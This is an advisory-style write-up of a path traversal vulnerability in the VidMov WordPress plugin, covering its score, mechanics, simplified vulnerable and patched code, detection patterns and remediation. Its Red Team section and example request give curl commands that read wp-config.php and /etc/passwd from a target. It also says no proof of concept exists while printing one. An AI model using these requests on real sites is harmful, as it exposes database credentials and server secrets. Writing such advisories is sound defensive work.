CVE-2025-67914
Executive Summary
CVE-2025-67914 is a path traversal vulnerability in the WordPress plugin VidMov by beeteam368, affecting versions up to and including 2.3.8. The vulnerability uses the .../...// pattern to bypass directory traversal filters, allowing an unauthenticated attacker to read arbitrary files on the server. This can lead to exposure of sensitive configuration files, database credentials, and other critical data. No public proof-of-concept (PoC) or patch is currently available, making this a high-risk unpatched vulnerability.

Supply Chain & Package Security
This vulnerability affects a WordPress plugin distributed via the official WordPress plugin repository. Users are advised to monitor for updates from the vendor and consider removing the plugin if no patch is forthcoming.
CVSS Breakdown & Threat Level
- CVSS Score: 7.7 (High)
- Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- Attack Vector: Network
- Attack Complexity: Low
- Privileges Required: None
- User Interaction: None
- Scope: Unchanged
- Confidentiality Impact: High
- Integrity Impact: None
- Availability Impact: None
The high confidentiality impact and low attack complexity make this a critical threat for unpatched installations.
Deep Dive & Mechanics
The vulnerability resides in the file handling logic of the VidMov plugin. The plugin fails to properly sanitize user-supplied file paths, specifically when processing requests for video files or thumbnails. The .../...// pattern exploits a common weakness in path traversal filters that only check for ../ but not variations like .../ or double slashes. By encoding or repeating the traversal sequence, an attacker can escape the intended directory and read arbitrary files.
Example attack vector:
GET /wp-content/plugins/vidmov/download.php?file=.../...//wp-config.php HTTP/1.1
Host: target.com
This request would return the contents of wp-config.php, exposing database credentials and other secrets.
Vulnerable vs. Patched Code
Vulnerable code (simplified):
$file = $_GET['file'];
$path = '/var/www/html/uploads/' . $file;
if (file_exists($path)) {
readfile($path);
}
Patched code (recommended):
$file = basename($_GET['file']);
$path = realpath('/var/www/html/uploads/' . $file);
if ($path && strpos($path, '/var/www/html/uploads/') === 0) {
readfile($path);
}
The patched version uses basename() to strip directory components and realpath() to resolve the absolute path, then verifies it stays within the allowed directory.
Exploitation & Lab Setup
Red Team
Lab Setup:
- Install WordPress with VidMov plugin version 2.3.8.
- Ensure the plugin is active and accessible.
Exploitation:
curl -v "http://target.com/wp-content/plugins/vidmov/download.php?file=.../...//wp-config.php"
Expected output: The contents of wp-config.php will be displayed.
Advanced exploitation:
curl -v "http://target.com/wp-content/plugins/vidmov/download.php?file=.../...//.../...//etc/passwd"
Blue Team
Detection:
- Monitor web server logs for requests containing
.../...//or similar traversal patterns. - Look for requests to
download.phpwith suspiciousfileparameters.
Hunting:
grep -E '\.\.\./\.\.\.//' /var/log/apache2/access.log
Prevention:
- Implement a Web Application Firewall (WAF) rule to block
.../...//patterns. - Disable the plugin until a patch is available.
Indicators of Compromise (IOCs)
- URL patterns:
.../...//in thefileparameter ofdownload.php - Log entries: HTTP 200 responses to requests with traversal patterns
- File access: Unauthorized reads of
wp-config.php,.htaccess, or other sensitive files

Remediation & Mitigation
- Immediate: Disable the VidMov plugin if not essential.
- Short-term: Implement a WAF rule to block
.../...//patterns. - Long-term: Monitor the vendor's website for a patch. If none is released, consider replacing the plugin with an alternative.
- Compromise assessment: Check web server logs for any successful exploitation attempts and rotate any exposed credentials.
